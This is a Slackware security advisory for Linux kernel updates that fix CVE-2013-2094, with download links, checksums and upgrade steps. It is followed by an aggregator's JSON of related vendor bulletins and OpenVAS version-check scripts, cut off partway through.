ID: SSA-2013-140-01
Type: slackware
Reporter: Slackware Linux Project
Modified: 2013-05-20T15:28:44
Description
New Linux kernel packages are available for Slackware 13.37 and 14.0 to fix
a security issue.
Here are the details from the Slackware 14.0 ChangeLog:
patches/packages/linux-3.2.45/*: Upgraded.
 Upgraded to new kernels that fix CVE-2013-2094, a bug that can allow local
 users to gain a root shell. Be sure to upgrade your initrd and reinstall
 LILO after upgrading the kernel packages.
 For more information, see:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094
 (* Security fix *)
Where to find the new packages:
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated packages for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/linux-2.6.37.6-3/
Updated packages for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/linux-2.6.37.6-3/
Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/linux-3.2.45/
Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.45/
MD5 signatures:
Slackware 13.37 packages:
99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz
de925c472fb6c330eead07a3e767b65a kernel-generic-2.6.37.6-i486-3.txz
d2f771b44accf311737c776fb5704805 kernel-generic-smp-2.6.37.6_smp-i686-3.txz
9d0b7d34403e2a6a2e4936b7095b8e47 kernel-headers-2.6.37.6_smp-x86-3.txz
30f60d09d7b1690ab314db56d6d65df5 kernel-huge-2.6.37.6-i486-3.txz
9184cfc5b40d882336b443aef1897029 kernel-huge-smp-2.6.37.6_smp-i686-3.txz
0b3644301f1404a0cdcc76f6adffeaf6 kernel-modules-2.6.37.6-i486-3.txz
c130f273b9a2aa8cd54a3167ffa48aec kernel-modules-smp-2.6.37.6_smp-i686-3.txz
c4fb8b49f8cb8e4cc62c53ad2a0a4c00 kernel-source-2.6.37.6_smp-noarch-3.txz
Slackware x86_64 13.37 packages:
99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz
7efb7195c7d7dbc6ab3f40454670bc64 kernel-generic-2.6.37.6-x86_64-3.txz
e9f689a3ee6f1937c33d0c9ea20ac9ff kernel-headers-2.6.37.6-x86-3.txz
93bc2c1264a195e08ce9bb616832f29d kernel-huge-2.6.37.6-x86_64-3.txz
cc788fc70ae0204c54228c40bce1e8f6 kernel-modules-2.6.37.6-x86_64-3.txz
ed5bbc7fb55c1a4c8e34de5a7a9c43fc kernel-source-2.6.37.6-noarch-3.txz
Slackware 14.0 packages:
99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz
3e2a61b57a99907d99eb74e67ff57e0c kernel-generic-3.2.45-i486-1.txz
6fbd61f493081e0526254ed0b7f1f735 kernel-generic-smp-3.2.45_smp-i686-1.txz
3a3a54ba8c971b9b9f93551c97bb06d9 kernel-headers-3.2.45_smp-x86-1.txz
778ff709728bf92c3adf5c7cdaab4dd7 kernel-huge-3.2.45-i486-1.txz
b1416ff63c7d9b497292c2a9997bcd5c kernel-huge-smp-3.2.45_smp-i686-1.txz
39312f1bbffc432c236f03b35c74b790 kernel-modules-3.2.45-i486-1.txz
02927b33dfd01ccbb44f8276484802b1 kernel-modules-smp-3.2.45_smp-i686-1.txz
6a2a843660fd349fe88de23d8db017df kernel-source-3.2.45_smp-noarch-1.txz
Slackware x86_64 14.0 packages:
99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz
25804c3fc32f8dc4b8ba25c2de8f969e kernel-generic-3.2.45-x86_64-1.txz
6ea9ec608564408bad734d8610c695b0 kernel-headers-3.2.45-x86-1.txz
0b452f0c8ec46c4ce04fd2d9c78e7687 kernel-huge-3.2.45-x86_64-1.txz
eba43509f3118eb27c7b4e4918b87155 kernel-modules-3.2.45-x86_64-1.txz
43b0d8457ab00cdf1f46461676fc1d71 kernel-source-3.2.45-noarch-1.txz
Installation instructions:
Upgrade the packages as root:
> upgradepkg kernel-*.txz
On Slackware 14.0 systems the kernel version has changed, so you will need
to rebuild your initrd if you are using one.
For Slackware 64-14.0 use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash
For Slackware 14.0 (32-bit) SMP, use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45-smp | bash
For Slackware 14.0 (32-bit) uniprocessor, use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash
Please note that "uniprocessor" has to do with the kernel you are running,
not with the CPU. Most systems should run the SMP kernel if they can
regardless of the number of cores the CPU has. If you aren't sure which
kernel you are running, run "uname -a". If you see SMP there, you are
running the SMP kernel and should use the 3.2.45-smp version when running
mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit
systems should always use 3.2.45 as the version.
For all systems (13.37 and 14.0):
If needed, edit your /etc/lilo.conf to adjust the version number on the
"image =" line. By default this will not have a version number and will
just follow the /boot/vmlinuz symlink, but you might need to make this
change if you've edited your lilo.conf manually.
Then, run "lilo" to reinstall the boot loader.
If there are no errors from LILO, reboot the system to begin using the
new kernel.
Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.597338
CVSS (as recorded by the aggregator): 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
Cross-referenced bulletins for CVE-2013-2094: Ubuntu USN-1825-1, USN-1826-1,
USN-1827-1, USN-1828-1, USN-1836-1, USN-1838-1, USN-1839-1, USN-1849-1;
Red Hat RHSA-2013:0830, RHSA-2013:0832, RHSA-2013:0840, RHSA-2013:0841;
CentOS CESA-2013:0830; Oracle ELSA-2013-0830, ELSA-2013-0911, ELSA-2013-2524,
ELSA-2013-2525; Debian DSA-2669-1; Amazon ALAS-2013-190; F5 K14445 (SOL14445);
SUSE-SU-2013:0819-1, SUSE-SU-2013:0819-2, openSUSE-SU-2013:0847-1,
openSUSE-SU-2013:0951-1, openSUSE-SU-2013:1042-1; CERT VU:774103.
{"cve": [{"lastseen": "2020-12-09T19:52:40", "description": "The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.", "edition": 5, "cvss3": {}, "published": "2013-05-14T20:55:00", "title": "CVE-2013-2094", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2094"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.8.2"], "id": "CVE-2013-2094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:38", "bulletinFamily": 
"software", "cvelist": ["CVE-2013-2094"], "edition": 1, "description": "\nF5 Product Development has assigned ID 421206 (BIG-IP) and ID 422534 (Enterprise Manager) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.0.0 - 9.6.1 \n| Linux kernel \nBIG-IP AAM | 11.4.0 | 11.4.1 | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.4.0 \n| 11.4.1 | Linux kernel \nBIG-IP Analytics | 11.2.0 - 11.4.0 | 11.4.1 \n11.0.0 - 11.1.0 | Linux kernel \nBIG-IP APM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 \n| Linux kernel \nBIG-IP ASM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.0 - 9.4.8 \n| Linux kernel \nBIG-IP Edge Gateway \n| 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 \n| Linux kernel \nBIG-IP GTM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.2 - 9.4.8 \n| Linux kernel \nBIG-IP Link Controller | 11.2.0 - 11.4.0 | 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.2 - 9.4.8 \n| Linux kernel \nBIG-IP PEM | 11.3.0 - 11.4.0 \n| 11.4.1 | Linux kernel \nBIG-IP PSM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.4.5 - 9.4.8 \n| Linux kernel \nBIG-IP WebAccelerator | 11.2.0 - 11.3.0 \n| 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.4.0 - 9.4.8 | Linux kernel \nBIG-IP WOM | 11.2.0 - 11.3.0 \n| 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | Linux kernel \nARX | None | 6.0.0 - 6.4.0 \n5.0.0 - 5.3.1 | None \nEnterprise Manager | 3.0.0 - 3.1.1 | 2.0.0 - 2.3.0 \n1.6.0 - 1.8.0 | Linux kernel \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None\n\nTo mitigate this vulnerability, you can enable 
Appliance mode for vulnerable BIG-IP versions. For information about Appliance mode, refer to the following article:\n\n**Impact of action:** Appliance mode is designed to meet the needs of customers in especially sensitive sectors by limiting the BIG-IP system administrative access to match that of a typical network appliance and not a multi-user UNIX device. \n\n\n * [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>) \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-06T16:51:00", "published": "2013-06-06T19:40:00", "href": "https://support.f5.com/csp/article/K14445", "id": "F5:K14445", "title": "Linux kernel vulnerability CVE-2013-2094", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nTo mitigate this vulnerability, you can enable Appliance mode for vulnerable BIG-IP versions. For information about Appliance mode, refer to the following article:\n\n**Impact of action:** Appliance mode is designed to meet the needs of customers in especially sensitive sectors by limiting the BIG-IP system administrative access to match that of a typical network appliance and not a multi-user UNIX device. 
\n\n\n * SOL12815: Overview of Appliance mode \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-07-25T00:00:00", "published": "2013-06-06T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/400/sol14445.html", "id": "SOL14445", "title": "SOL14445 - Linux kernel vulnerability CVE-2013-2094", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "This update to the SUSE Linux Enterprise 11 SP2 kernel\n fixes the following critical security issue:\n\n * A bounds checking problem in the perf systemcall\n could be used by local attackers to crash the kernel or\n execute code in kernel context. 
(CVE-2013-2094\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094</a>\n > )\n", "edition": 1, "modified": "2013-05-22T02:04:20", "published": "2013-05-22T02:04:20", "id": "SUSE-SU-2013:0819-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00008.html", "title": "Security update for the Linux Kernel (x86) (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The SUSE Linux Enterprise 11 SP2 RT kernel has been updated\n to fix a critical security issue.\n\n * CVE-2013-2094: A bounds checking problem in the perf\n systemcall could be used by local attackers to crash the\n kernel or execute code in kernel context.\n", "edition": 1, "modified": "2013-05-24T17:04:28", "published": "2013-05-24T17:04:28", "id": "SUSE-SU-2013:0819-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00009.html", "title": "Security update for Linux kernel (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:49", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0290", "CVE-2013-2094"], "description": "The openSUSE 12.3 kernel was updated to fix a critical\n security issue, other security issues and several bugs.\n\n Security issues fixed: CVE-2013-2094: The perf_swevent_init\n function in kernel/events/core.c in the Linux kernel used\n an incorrect integer data type, which allowed local users\n to gain privileges via a crafted perf_event_open system\n call.\n\n CVE-2013-0290: The __skb_recv_datagram function in\n net/core/datagram.c in the Linux kernel did not properly\n handle the MSG_PEEK flag with zero-length data, which\n allowed local users to cause a denial of 
service (infinite\n loop and system hang) via a crafted application.\n\n Bugs fixed:\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - ACPI / thermal: do not always return\n THERMAL_TREND_RAISING for active trip points (bnc#820048).\n\n - perf: Treat attr.config as u64 in perf_swevent_init()\n (bnc#819789, CVE-2013-2094).\n\n - cxgb4: fix error recovery when t4_fw_hello returns a\n positive value (bnc#818497).\n\n - kabi/severities: Ignore drivers/mfd/ucb1400_core It\n provides internal exports to UCB1400 drivers, that we\n have just disabled.\n\n - Fix -devel package for armv7hl armv7hl kernel flavors in\n the non-multiplatform configuration (which is the default\n for our openSUSE 12.3 release), needs more header files\n from the machine specific directories to be included in\n kernel-devel.\n\n - Update config files: disable UCB1400 on all but ARM\n Currently UCB1400 is only used on ARM OMAP systems, and\n part of the code is dead code that can't even be\n modularized.\n - CONFIG_UCB1400_CORE=n\n - CONFIG_TOUCHSCREEN_UCB1400=n\n - CONFIG_GPIO_UCB1400=n\n\n - rpm/config.sh: Drop the ARM repository, the KOTD will\n build against the "ports" repository of openSUSE:12.3\n\n - mm/mmap: check for RLIMIT_AS before unmapping\n (bnc#818327).\n\n - rpm/kernel-spec-macros: Properly handle KOTD release\n numbers with .g<commit> suffix\n\n - rpm/kernel-spec-macros: Drop the %release_num macro We no\n longer put the -rcX tag into the release string.\n\n - xen-pciback: notify hypervisor about devices intended to\n be assigned to guests.\n\n - unix/stream: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: peek beyond 0-sized skbs (bnc#803931\n CVE-2013-0290).\n - net: fix infinite loop in __skb_recv_datagram()\n (bnc#803931 CVE-2013-0290).\n\n - TTY: fix atime/mtime regression (bnc#815745).\n\n - 
md/raid1,raid10: fix deadlock with freeze_array()\n (813889).\n - md: raid1,10: Handle REQ_WRITE_SAME flag in write bios\n (bnc#813889).\n\n - KMS: fix EDID detailed timing vsync parsing.\n - KMS: fix EDID detailed timing frame rate.\n\n - Add Netfilter/ebtables support Those modues are needed\n for proper OpenStack support on ARM, and are also enabled\n on x86(_64)\n\n", "edition": 1, "modified": "2013-06-10T18:16:01", "published": "2013-06-10T18:16:01", "id": "OPENSUSE-SU-2013:0951-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00009.html", "title": "kernel: security and bugfix update (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:52:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2850", "CVE-2013-0290", "CVE-2013-2094"], "description": "The openSUSE 12.2 kernel was updated to fix security issue\n and other bugs.\n\n Security issues fixed: CVE-2013-2850: Incorrect strncpy\n usage in the network listening part of the iscsi target\n driver could have been used by remote attackers to crash\n the kernel or execute code.\n\n This required the iscsi target running on the machine and\n the attacker able to make a network connection to it (aka\n not filtered by firewalls).\n\n CVE-2013-2094: The perf_swevent_init function in\n kernel/events/core.c in the Linux kernel used an incorrect\n integer data type, which allowed local users to gain\n privileges via a crafted perf_event_open system call.\n\n CVE-2013-0290: The __skb_recv_datagram function in\n net/core/datagram.c in the Linux kernel did not properly\n handle the MSG_PEEK flag with zero-length data, which\n allowed local users to cause a denial of service (infinite\n loop and system hang) via a crafted application.\n\n Bugs fixed:\n - reiserfs: fix spurious multiple-fill in\n reiserfs_readdir_dentry (bnc#822722).\n\n - reiserfs: fix problems with chowning setuid file w/\n 
xattrs (bnc#790920).\n\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - Update config files: disable UCB1400 on all but ARM\n Currently UCB1400 is only used on ARM OMAP systems, and\n part of the code is dead code that can't even be\n modularized.\n - CONFIG_UCB1400_CORE=n\n - CONFIG_TOUCHSCREEN_UCB1400=n\n - CONFIG_GPIO_UCB1400=n\n\n - mm/mmap: check for RLIMIT_AS before unmapping\n (bnc#818327).\n - unix/stream: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: peek beyond 0-sized skbs (bnc#803931\n CVE-2013-0290).\n\n", "edition": 1, "modified": "2013-06-19T11:04:11", "published": "2013-06-19T11:04:11", "id": "OPENSUSE-SU-2013:1042-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00017.html", "title": "kernel: security and bugfix update (critical)", "type": "suse", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1797", "CVE-2013-1767", "CVE-2013-1774", "CVE-2013-0913", "CVE-2013-1928", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-1798"], "description": "The openSUSE 12.1 kernel was updated to fix a severe\n secrutiy issue and various bugs.\n\n Security issues fixed: CVE-2013-2094: The perf_swevent_init\n function in kernel/events/core.c in the Linux kernel used\n an incorrect integer data type, which allowed local users\n to gain privileges via a crafted perf_event_open system\n call.\n\n CVE-2013-1774: The chase_port function in\n drivers/usb/serial/io_ti.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer\n dereference and system crash) via an attempted /dev/ttyUSB\n read or write operation on a disconnected Edgeport USB\n serial converter.\n\n CVE-2013-1928: The 
do_video_set_spu_palette function in\n fs/compat_ioctl.c in the Linux kernel lacked a certain\n error check, which might have allowed local users to obtain\n sensitive information from kernel stack memory via a\n crafted VIDEO_SET_SPU_PALETTE ioctl call on a /dev/dvb\n device.\n\n CVE-2013-1796: The kvm_set_msr_common function in\n arch/x86/kvm/x86.c in the Linux kernel did not ensure a\n required time_page alignment during an MSR_KVM_SYSTEM_TIME\n operation, which allowed guest OS users to cause a denial\n of service (buffer overflow and host OS memory corruption)\n or possibly have unspecified other impact via a crafted\n application.\n\n CVE-2013-1797: Use-after-free vulnerability in\n arch/x86/kvm/x86.c in the Linux kernel allowed guest OS\n users to cause a denial of service (host OS memory\n corruption) or possibly have unspecified other impact via a\n crafted application that triggers use of a guest physical\n address (GPA) in (1) movable or (2) removable memory during\n an MSR_KVM_SYSTEM_TIME kvm_set_msr_common operation.\n\n CVE-2013-1798: The ioapic_read_indirect function in\n virt/kvm/ioapic.c in the Linux kernel did not properly\n handle a certain combination of invalid IOAPIC_REG_SELECT\n and IOAPIC_REG_WINDOW operations, which allowed guest OS\n users to obtain sensitive information from host OS memory\n or cause a denial of service (host OS OOPS) via a crafted\n application.\n\n CVE-2013-1767: Use-after-free vulnerability in the\n shmem_remount_fs function in mm/shmem.c in the Linux kernel\n allowed local users to gain privileges or cause a denial of\n service (system crash) by remounting a tmpfs filesystem\n without specifying a required mpol (aka mempolicy) mount\n option.\n\n CVE-2013-0913: Integer overflow in\n drivers/gpu/drm/i915/i915_gem_execbuffer.c in the i915\n driver in the Direct Rendering Manager (DRM) subsystem in\n the Linux kernel allowed local users to cause a denial of\n service (heap-based buffer overflow) or possibly have\n 
unspecified other impact via a crafted application that\n triggers many relocation copies, and potentially leads to a\n race condition.\n\n Bugs fixed:\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - TTY: fix atime/mtime regression (bnc#815745).\n\n - fs/compat_ioctl.c: VIDEO_SET_SPU_PALETTE missing error\n check (bnc#813735).\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n - KVM: Fix bounds checking in ioapic indirect register read\n (bnc#806980 CVE-2013-1798).\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n - kabi/severities: Allow kvm module abi changes - modules\n are self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).\n\n", "edition": 1, "modified": "2013-05-31T16:04:13", "published": "2013-05-31T16:04:13", "id": "OPENSUSE-SU-2013:0847-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00018.html", "title": "kernel: security and bugfix update (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-02-06T13:10:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of linux-lts-quantal", "modified": "2018-02-05T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841425", "href": "http://plugins.openvas.org/nasl.php?oid=841425", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1828-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n# $Id: gb_ubuntu_USN_1828_1.nasl 8672 2018-02-05 16:39:18Z teissa $\n#\n# Ubuntu Update for linux-lts-quantal USN-1828-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_insight = \"An flaw was discovered in the Linux kernel's perf_events interface. 
A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"linux-lts-quantal on Ubuntu 12.04 LTS\";\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_id(841425);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:35 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1828-1\");\n\n script_xref(name: \"USN\", value: \"1828-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1828-1/\");\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-quantal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Oracle Linux Local Security Checks ELSA-2013-2524", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123624", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-2524", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-2524.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
